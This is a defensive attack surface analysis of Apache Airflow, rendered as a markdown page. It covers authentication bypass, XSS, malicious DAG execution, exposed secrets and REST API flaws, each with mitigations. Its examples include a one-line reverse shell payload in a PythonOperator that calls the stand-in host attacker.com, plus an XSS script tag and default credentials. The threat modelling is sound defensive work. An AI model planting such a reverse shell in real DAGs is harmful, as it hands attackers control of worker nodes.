Skip to content

Latest commit

 

History

History
69 lines (58 loc) · 8.11 KB

attack-surface.md

File metadata and controls

69 lines (58 loc) · 8.11 KB

Attack Surface Analysis for apache/airflow

Attack Surface: Web UI Authentication Bypass

  • Description: Attackers bypass authentication mechanisms to gain unauthorized access to the Airflow Web UI.
  • Airflow Contribution: Airflow Web UI provides a central management interface. Weak default configurations or misconfigurations in authentication setup directly expose this interface.
  • Example: An Airflow instance is deployed with default username/password (airflow/airflow). An attacker uses these credentials to log in and gain full control over DAGs, connections, and variables.
  • Impact: Full compromise of the Airflow environment, including ability to execute arbitrary code via DAGs, access sensitive data in connections and variables, and disrupt operations.
  • Risk Severity: Critical
  • Mitigation Strategies:
    • Change Default Credentials: Immediately change default usernames and passwords for all Airflow users, especially administrative accounts.
    • Implement Strong Authentication: Enforce strong password policies and consider multi-factor authentication (MFA).
    • Integrate with External Authentication Providers: Utilize robust authentication backends like LDAP, OAuth, or SAML for centralized user management and stronger security.
    • Regularly Audit User Permissions: Review and enforce the principle of least privilege by assigning users only necessary roles and permissions within Airflow RBAC.

Attack Surface: DAG Definition Injection (XSS)

  • Description: Malicious code (JavaScript) is injected into DAG definitions or task parameters, which is then executed in the context of other users' browsers when they view the DAG in the Web UI.
  • Airflow Contribution: Airflow Web UI displays DAG definitions, task details, and logs. If these are not properly sanitized, they become vulnerable to XSS.
  • Example: A DAG parameter is crafted to include <script>alert('XSS')</script>. When a user views the DAG details in the Web UI, the JavaScript code executes, potentially stealing session cookies or performing other malicious actions.
  • Impact: Session hijacking, account takeover, defacement of the Web UI, and potential redirection to malicious websites.
  • Risk Severity: High
  • Mitigation Strategies:
    • Input Sanitization and Output Encoding: Implement strict input sanitization for all user-provided data displayed in the Web UI, especially in DAG parameters, logs, and task details. Use proper output encoding techniques to prevent browser interpretation of malicious scripts.
    • Content Security Policy (CSP): Implement a strong Content Security Policy to restrict the sources from which the browser can load resources, mitigating the impact of XSS attacks.
    • Regular Security Audits and Penetration Testing: Conduct regular security audits and penetration testing to identify and remediate potential XSS vulnerabilities in the Web UI and custom plugins.

Attack Surface: Malicious DAG Code Execution

  • Description: Attackers introduce malicious code within DAG definitions that gets executed by Airflow workers, leading to arbitrary code execution on the worker nodes.
  • Airflow Contribution: Airflow's core functionality is to execute DAGs, which are essentially Python code. If DAGs are not carefully reviewed or sourced from untrusted locations, they can be vectors for malicious code.
  • Example: A DAG is crafted to include a PythonOperator that executes a reverse shell command: PythonOperator(task_id='malicious_task', python_callable=lambda: __import__('os').system('bash -c "bash -i >& /dev/tcp/attacker.com/4444 0>&1"')). When this DAG runs, it establishes a reverse shell to the attacker's machine.
  • Impact: Full compromise of Airflow worker nodes, data breaches, lateral movement within the network, and disruption of operations.
  • Risk Severity: Critical
  • Mitigation Strategies:
    • DAG Code Review and Version Control: Implement mandatory code review processes for all DAG changes. Use version control systems (like Git) to track DAG modifications and ensure auditability.
    • Restrict DAG Authoring Access: Limit DAG authoring and deployment permissions to trusted individuals or teams.
    • Secure DAG Storage and Deployment: Store DAGs in secure repositories with access controls. Implement secure DAG deployment pipelines to prevent unauthorized modifications.
    • Operator Sandboxing and Least Privilege: Where possible, use operators that provide sandboxing or restrict the privileges of executed tasks. Run Airflow workers with the least necessary privileges.
    • Static Code Analysis and Security Scanning: Use static code analysis tools to scan DAG code for potential security vulnerabilities before deployment.

Attack Surface: Secrets Exposure in DAGs

  • Description: Sensitive credentials (API keys, passwords, database connection strings) are exposed within DAG code or Airflow configurations, making them accessible to attackers.
  • Airflow Contribution: DAGs often require access to external systems, necessitating the use of secrets. If secrets are not managed securely within Airflow, they become a significant attack surface.
  • Example: A DAG directly embeds a database password in a connection string within the DAG code: conn = psycopg2.connect("host=db.example.com dbname=mydatabase user=airflow password=hardcodedpassword"). If the DAG repository is compromised, the password is exposed.
  • Impact: Unauthorized access to external systems, data breaches, and potential escalation of privileges.
  • Risk Severity: High
  • Mitigation Strategies:
    • Utilize Airflow Connections and Variables: Store secrets securely using Airflow Connections and Variables features instead of hardcoding them in DAGs.
    • External Secrets Management: Integrate Airflow with external secrets management systems (e.g., HashiCorp Vault, AWS Secrets Manager, Azure Key Vault) to centralize and secure secret storage and retrieval.
    • Avoid Hardcoding Secrets: Strictly prohibit hardcoding secrets directly in DAG code or configuration files.
    • Regular Secret Rotation: Implement a policy for regular rotation of secrets to limit the window of opportunity if a secret is compromised.
    • Secrets Masking in Logs: Configure Airflow to mask secrets in logs to prevent accidental exposure through logging.

Attack Surface: API Authentication and Authorization Flaws

  • Description: Vulnerabilities in the Airflow REST API authentication and authorization mechanisms allow unauthorized access to API endpoints and functionalities.
  • Airflow Contribution: Airflow provides a REST API for programmatic interaction. Weak API security exposes this interface to potential attacks.
  • Example: An API endpoint lacks proper authentication checks. An attacker can send requests to this endpoint without valid credentials and perform actions like triggering DAG runs or retrieving sensitive information.
  • Impact: Unauthorized access to Airflow functionalities, data manipulation, denial of service, and potential escalation of privileges.
  • Risk Severity: High
  • Mitigation Strategies:
    • Enforce API Authentication: Ensure all API endpoints require proper authentication (e.g., API keys, OAuth tokens).
    • Implement API Authorization: Apply granular authorization controls to API endpoints, ensuring users can only access resources and actions they are permitted to.
    • API Rate Limiting and Throttling: Implement rate limiting and throttling on API endpoints to prevent denial-of-service attacks and brute-force attempts.
    • API Input Validation: Thoroughly validate all input data received by API endpoints to prevent injection attacks and other vulnerabilities.
    • Secure API Communication (HTTPS): Enforce HTTPS for all API communication to protect data in transit.